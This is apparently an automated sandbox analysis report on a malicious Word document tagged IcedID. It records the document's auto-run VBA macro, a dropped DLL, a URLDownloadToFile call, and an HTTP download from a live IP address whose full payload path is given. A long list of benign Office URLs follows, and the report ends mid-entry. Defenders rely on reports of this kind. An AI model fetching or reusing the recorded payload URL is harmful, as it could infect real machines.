Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cnewton doc 08.11.2022.doc

Overview

General Information

Sample Name:cnewton doc 08.11.2022.doc
Analysis ID:682599
MD5:ee1d6eb5b07b99e65fc0cb477193c35c
SHA1:9d4dbf701c8ede93a79036dd5a0316da988a2eeb
SHA256:23b9a20a59041fc7d484957e49ffa7e0f6dba7dbbec0628a4adb69c2e05863ab
Tags:docIcedID
Infos:
Errors
  • Corrupt sample or wrongly selected analyzer.

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Machine Learning detection for sample
One or more processes crash
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 1220 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • WerFault.exe (PID: 4088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4160 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 3636 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4152 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: cnewton doc 08.11.2022.docVirustotal: Detection: 21%Perma Link
Source: cnewton doc 08.11.2022.docReversingLabs: Detection: 15%
Machine Learning detection for sample
Source: cnewton doc 08.11.2022.docJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\RemoteDllLoader\Release-x32\RemoteDllLoader.pdb source: WINWORD.EXE, 00000000.00000000.348321457.000000001496F000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.337697577.0000000014BF0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\MemLoader\Release-x32\MemLoader.pdb source: WINWORD.EXE, 00000000.00000000.348321457.000000001496F000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.337697577.0000000014BF0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\RemoteDllLoader\Release-x32\RemoteDllLoader.pdb source: WINWORD.EXE, 00000000.00000000.348321457.000000001496F000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.337697577.0000000014BF0000.00000040.00000001.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\MICROS~1\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7.1\

Software Vulnerabilities

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y5A7.tmp.dllJump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WerFault.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXESection loaded: unknown origin: URLDownloadToFileA
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficHTTP traffic detected: GET /fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.8.146.139Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.8.146.139 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: WINWORD.EXE, 00000000.00000000.319693683.0000000012350000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/
Source: WINWORD.EXE, 00000000.00000000.331890958.000000000DCF2000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.330024190.000000000DAF0000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.319834136.0000000012362000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
Source: WINWORD.EXE, 00000000.00000000.330024190.000000000DAF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f.
Source: WINWORD.EXE, 00000000.00000000.310100247.000000000DCA8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f71USERNAME=userUSERPROFILE=C:
Source: WINWORD.EXE, 00000000.00000000.330024190.000000000DAF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f=
Source: WINWORD.EXE, 00000000.00000000.339121868.00000000123F7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fC:
Source: WINWORD.EXE, 00000000.00000000.303139501.000000000B0EF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352872367.000000000B0EF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fOOC:
Source: WINWORD.EXE, 00000000.00000000.331890958.000000000DCF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fe
Source: WINWORD.EXE, 00000000.00000000.319834136.0000000012362000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fn
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://b.c2r.ts.cdn.office.net/prpointjm#M
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/prpoint(mmM
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: WINWORD.EXE, 00000000.00000000.303139501.000000000B0EF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352872367.000000000B0EF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram-E0
Source: WINWORD.EXE, 00000000.00000000.303139501.000000000B0EF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352872367.000000000B0EF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxBD
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: WINWORD.EXE, 00000000.00000000.325229073.000000000D281000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalledg
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticatedx
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/apps/removeK
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeId
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query)
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/api/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechRS
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.aadrm.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.aadrm.com/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.addins.omex.office.net/appstate/query?
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryl
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.cortana.ai
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.cortana.aiL
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.cortana.aiU
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnostics.office.comointk
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnostics.office.comom
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnostics.office.comq
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file#ZsN?
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.office.net
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.net.&
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.netA&.H
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.netd&
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.onedrive.com
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/beta/myorg/importshG&M
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsQG
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://augloop.office.com
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://augloop.office.com/v2
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com/v2R
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com/v2c
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://cdn.entity.
Source: WINWORD.EXE, 00000000.00000000.325229073.000000000D281000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://clients.config.office.net/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/a.
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallationr
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies_J
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ios%
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosR
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: WINWORD.EXE, 00000000.00000000.325229073.000000000D281000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey=3niE
Source: WINWORD.EXE, 00000000.00000000.325229073.000000000D281000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyhips
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://config.edge.skype.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com2qWIt
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://cortana.ai
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://cortana.ai/api
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.ai/apih
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.aietl
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://cr.office.com
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileN
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/oc&O8
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com2ckO1
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.comVb
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileY
Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://dev.cortana.ai
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://devnull.onenote.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://devnull.onenote.comt
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://directory.services.
